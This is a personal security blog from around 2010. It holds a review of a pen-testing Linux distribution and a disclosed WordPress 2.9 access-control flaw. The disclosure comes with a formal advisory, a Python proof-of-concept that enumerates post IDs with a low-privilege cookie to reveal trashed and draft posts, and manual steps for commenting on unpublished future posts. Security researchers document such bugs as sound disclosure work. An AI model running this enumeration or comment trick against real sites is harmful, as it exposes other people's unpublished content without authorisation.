tmacuk

For a while now I have been trying to find ways in which I can have my pen-testing computer and personal computer together. At the end of the day as long as my work reports and test results are encrypted, and I am not doing anything stupid in my personal time on the computer why not have them together.

I currently have two working computers. I have my laptop which I use most of the time as it is (at the moment) the best machine I own. I also have a very old computer that was built around when I was about 13. The laptop is currently running Ubuntu 9.10 (although as soon as the upgrade to 10.10 is made public I will defiantly be off of this) and the computer was running BackTrack.

BackTrack is a great pen-testing distribution, it does exactly what it is supposed to do. However as a personal opinion and someone who is really used the gnome interface and just Ubuntu as a whole, I prefer Ubuntu. I have been trying for a while (and not succeeding) in creating my own personal distro that I can install all the tool that I need using Ubuntu Minimal. At first it seemed like a great idea, but the time quickly came upon me and with Uni and work commitments I found myself having to throw the project to the side into a very high pile.

That was until however I saw a post on Twitter mentioning Ubuntu Pen-Testing Edition. I quickly jumped on to the website at which point I found out that they were changing to a new dedicated website and the download wasn’t going to be available till tomorrow. Let me please point out however that the lead developer of this project, Vitomir Margetic, has been so helpful right from the start of my life with the distribution – every email I have sent has been answered with the utmost quickness and respect, so thank you.

After some server issues when it first came up I finally got it downloaded and installed into a virtual machine – which if your planning on doing make sure you allocate at least 1gb of ram or more. As soon as it was installed I knew I was at home. Ubuntu PE was everything I liked about Ubuntu and BackTrack all into one. Ubuntu – because I knew how to get everything working exactly how I wanted it i.e. Adobe Air, Sound, Play on Linux etc and BackTrack – because I used it in my pen-testing for work that evening and I wasn’t a tool short, that night anyway.

There are a large amount of tools within Ubuntu that I must admit are within BackTrack, however there are other tools in there that are not. Then on the other hand there are parts of Ubuntu PE that I would want to change.

First of all I installed it because I liked the gnome interface, the one bar at bottom and the other at the top, that wasn’t there. It was a gnome interface alright, but looked like a copy of KDE, just the one bar at the bottom type thing. That was changed straight away. Secondly there are tools I have installed on my computer that I use for testing that were not installed. An example of this is the screenshot taker – Shutter which if I am honest I couldn’t live without so take a look.

All in all it is much simpler. Which to be fair is exactly what Ubuntu was designed for. Somebody who is new to Linux (in my opinion anyway). The argument you have here is that should somebody who needs something simple be using hacking tools that are included in both of these Distro’s? If they struggle with BT should they not really be thinking is this the Distro for me? I think it all comes down to how you want to use your pen-testing machine. Do you want a machine that you can use for everyday use as well or do want a machine just for your work? In my personal opinion the more things I can bunch together the better, this way I can use my other computer as a vulnerable machine to test my tools on.

I am moving away from Ubuntu soon, primarily because I think I am ready to move on to a harder distro so that I can learn more things about Linux itself, but secondly because of the way Ubuntu is changing – especially the new memory storage in version 10.10. So as for using this as my main system I would have to say no. However over BackTrack I will use this. It is new, easier and quicker to get going with and it does the job that I need it to do. I know you all may think all you need is the terminal window, but when your writing reports and taking screenshots its always better to have a look at something graphical that just text; and because I know my way around Ubuntu so well now and I can edit it the way I look i.e. RandomStorm logo on the bars etc. it works better for me.

This review wasn’t a dig at either community, just my personal opinion.

If you would like to download Ubuntu PE please visit – http://www.netinfinity.org/

There are new feature being developed as I am typing this review, I have some new found friends in Dundee that are getting involved with creating and making this a better distro for pen testers to use. A repository is currently being created so that you can port all the tools into an already existant Ubuntu setup – again some you can do with BackTrack but without having to read countless guides on how to do it.

Thanks -
Thomas MacKenzie

http://hackerpublicradio.org/eps/hpr0526.mp3

Arron Finnon (f1nux) – www.finux.co.uk – interview myself about the security vulnerability that I found in WordPress.

It has come to my attention that some people are upset about the bug that I have found in WP as apparently someone else had reported it.

Well the truth is that looking into it now that has been the case. The reason that I did not find it before is that the bug wasn’t named how I myself thought it should have been. Non the less this person did find the bug and do deserve credit in the sense that they did try to go to WP to explain but were not successful.

caesarsgrunt – http://profiles.wordpress.org/caesarsgrunt

You c an find more information here – http://hakre.wordpress.com/2010/02/16/the-short-memory-of-wordpress-org-security/

Please note I put a lot of hard work into finding and emulating this bug and I emailed WordPress directly with the advisory and I also have screen shots on how exactly the bug itself works.

Following on from my findings in WordPress a new version has been released. Anyone using WP upgrade to version 2.9.2 to stop the bug I found occurring to you.

After this has been released I got about 5 track backs on the blog post, my name is on the front page of the WP website, and my name is 3rd in Google rankings.

Thank you all for the support through this and checking out the blog.

tmacuk

WP unofficial patch released:

http://tmacuk.co.uk/trash_cap_check.diff

Following on from the research I have been conducted, I have now released the following advisory and it has been forwarded onto the correct people at WordPress

WordPress >= 2.9 Failure to Restrict URL Access

http://www.thomasmackenzie.co.uk/

1. *Advisory Information*

Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010

2. *Vulnerability Information*

Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes

3. *Software Description*

WordPress is a state-of-the-art publishing platform with a
focus on aesthetics, web standards, and usability. WordPress
is both free and priceless at the same time. [0]

4. *Vulnerability Description*

Frequently, the only protection for a URL is that links to that page
are not presented to unauthorized users. Security by obscurity is
not sufficient to protect sensitive functions and data in an application.
Access control checks must be performed before a request to a sensitive
function is granted, which ensures that the user is authorized to access
that function. [1]

5. *Vulnerable packages*

Versions >= 2.9

6. *Non-vulnerable packages*

Versions < 2.9

7. *Vulnerability Overview*

Since version 2.9 a new feature was implemented so that users
were able to retrieve posts that they may have deleted by accident.
This new feature was labeled ‘trash’. Any posts that are placed within
the trash are only viewable by authenticated priveleged users.

8. *Technical Description*

When WordPress implemented the new feature they failed to change the
permissions granted when the post is in the trash. This means that
an unauthenticated user cannot see the post, however an authenticated
user can no matter what priviledges they have, even ’subscriber’.

“Subscriber [User Level 0] – Somebody who can read comments/comment/receive news letters, etc.” [2]

9. *PoC*

#/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post ID's as an authenticated and unauthenticated user.
# If the requests differ a 'Trash' post has been found.
#
# You will need an authenticated user cookie of any priveledge to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
#
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib

# Declare vars
blogURL = "www.example.com"
userCookie = "enter_cookie_here"
postID = 0 #Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {"Cookie" : userCookie}

print
print "Target = http://" + blogURL + "/?p=" + str(postID)
print

while 1:

 # Start non authenticated enumeration

 request = '/?p=' + str(postID)
 conn.request("GET", request, "")

 try:
  r1 = conn.getresponse()
 except:
  print "Connection error"

 data1 = r1.read()

 # Start authenticated enumeration

 conn.request("GET", request, None, Headers)

 try:
  r2 = conn.getresponse()
 except:
  print "Connection error"

 data2 = r2.read()

 # Compare the HTML body reponses

 if data1 != data2:
  print "+ Found! http://" + blogURL + request
 else:
  print request

 postID += 1

conn.close()

10. *Credits*

Thomas Mackenzie (tmacuk) – http://www.thomasmackenzie.co.uk/
Original finder and tester.

Ryan Dewhurst (ethicalhack3r) – http://www.ryandewhurst.co.uk/
PoC creation and analysis.

Arron Finnon (f1nux) – http://www.finux.co.co.uk/
Helped with documentation.

Matthew Hughes – http://www.matthewhughes.co.uk/
Helped with documentation.

Robin Wood (digininja) – http://www.digininja.org/
Helped identify the vulnerability type.

11. *References*

[0] http://wordpress.org/
[1] http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
[2] http://codex.wordpress.org/Roles_and_Capabilities

So last night I received a call from ethicalhack3r saying that bug I had found should work in any blog because the Permalinks are still available even if you chose a different one. So what we were searching for was ?p= and then a random page number that had a post on it that wasn’t published.

He then wrote a script which would brute force the page numbers so that we could find them in any site. Not only did this show up all the drafts that I had at the moment, but also the posts that I had though I had deleted. The posts that had been deleted and never shown i.e. drafts, could be seen by a member on the forum. However future posts could not be, but the title could be seen.

We started to run this script against other people’s blogs to see if it worked for them, and it didn’t. So we came to the conclusion that it was my blog that had something wrong. I removed all my plug-ins and got ethicalhack3r to try again and it still worked. So I was getting really frustrated that it was something that I had done.

I then checked my theme and realised that there was an update. So I updated and it still worked! Ethicalhack3r then made a test blog using the scripts available through our host and installed the latest version of my theme. It wasn’t working now. We came to the conclusion that it must be the theme, but why did it work on my site and not on the test?

We compared source code and found the following -

<title><?php if (is_home () ) { bloginfo('name'); echo " - "; bloginfo('description');
} elseif (is_category() ) {single_cat_title(); echo " - "; bloginfo('name');
} elseif (is_single() || is_page() ) {single_post_title(); echo " - "; bloginfo('name');
} elseif (is_search() ) {bloginfo('name'); echo " search results: "; echo wp_specialchars($s);
} else { wp_title('',true); }?></title&gt

More specifically we were looking for this -

else { wp_title('',true);

All this is doing is telling the page to replicate the title of the post inside the title tags. This can found in the header.php

We then went to the website that the theme came from looking for a change log but couldn’t find one and we found that he hadn’t kept one. So all I know is that I was running > version 1.9.9.

A clean install of the theme would fix this, but the update doesn’t change this part of the code. After a few Google searches we found that a lot of people were using the old version of the theme and were vulnerable to the attack that I had found.

Another interesting thing is that you can post a comment to the future post, I currently have two comments schdualed for 01/01/2011 – the first one is from ethicalhack3r saying “Muhahahaha” & and the second one from Tom Sellers, someone who works on Nmap, said “Test post to Marty McFly.”

This is how it is done -

Open any of your blog posts.  Save a copy of the HTML document to local
disk.  Open that file with an editor and replace all instances of the
post id (mine was copied from post 122, http://tmacuk.co.uk/?p=122)
with the post id of the future post, in your case 153.  It shows up in
a few formats (p=122, value="122, value='122) so just find and replace
the number.

Save the document and then open it.  Enter a comment and post it. It should
show up on your future post, McFly    The captcha is a full link to the
captcha service so its live and works, BONUS!

So if you wanted to know why I have changed my theme there you go. I am guessing that you can still comment to that post now, however you wouldn’t be able to find it because that bug isn’t available on my site no more.

So the bug went a lot deeper than I first thought. I must thank ethicalhack3r and Tom Sellers for giving me some help last night, if it wasn’t for them this post would have probably taken a week to bring out and I probably would be using the same buggy theme.

Here is a link to the theme – http://wordpress.org/extend/themes/pixel. Remember a clean install will not produce the bug, so if you want to try it out, you need to edit the code to what I have talked about today.

tmacuk

I found this after I published a post for the future.

I don’t know how much you guys know about Wordpress, the main thing I want you to know is that PlayStation and Ebay use it.

Imagine if you could find out something that PlayStation was going to release before they announced it? Lets take the example of Apple annoucing the Ipad. It would make alot of sense for them to write the article first and have it so that it publishes itself when they are giving the talk at whatever conference they did. What if you could see the title of this document before hand.

Using simple URL bruteforcing you can. There are a number of different options in Wordpress that you can use for your URL “Permalinks” I just use ?p=153 meaning I guess post=(number). You can however use variations of dates, numbers or create you own.

I have just created a post which isn’t going to be released until next year take a look at http://tmacuk.co.uk/?p=153 – Look at the top of your browser and you can see the title of the post that I have made

Imagine finding out about the PlayStation 4 :S

tmacuk

So finally the second interview has been recorded, editing and placed on the website.

After the success from my last interview, where I saw a record amount of hits/comment on the website, and a lot of replays on different security podcasts I have decided to look more in depth into the technical world of a hacker.

The interview can be found here LINK

The script that we talk about on the call can be found here LINK

Any question email me at tmac<----@---->tmacuk.co.uk

hopefully this will be uploaded on HPR very soon.

The views expressed here are my own and not that of my University. I do not condone any of the actions within this interview and would like to make aware that this was done for educational purposes only. I condemn any of the actions that this hacker has done that are illegal and any comments made by myself that may seem to condone/agree with them is just the way I speak and act. I again must stress that this was done for educational purposes only and I DO NOT CONDONE AND CONDEMN the actions spoke about.

——
I have been wanting to do these interviews for a while but have struggled to find someone who will actually do the interview with me. I eventually found n0g00d in some vast corner of the internet – actually he commented on my website

I asked for the interview and he was more than happy. He talks to us about where he started, what he has done in the past and the reasons why he does it. He also asks me a question too.

Please enjoy the interview which can be found HERE

He also asked me to have this screen shot available to show you evidence of the “biggest thing he has hacked”.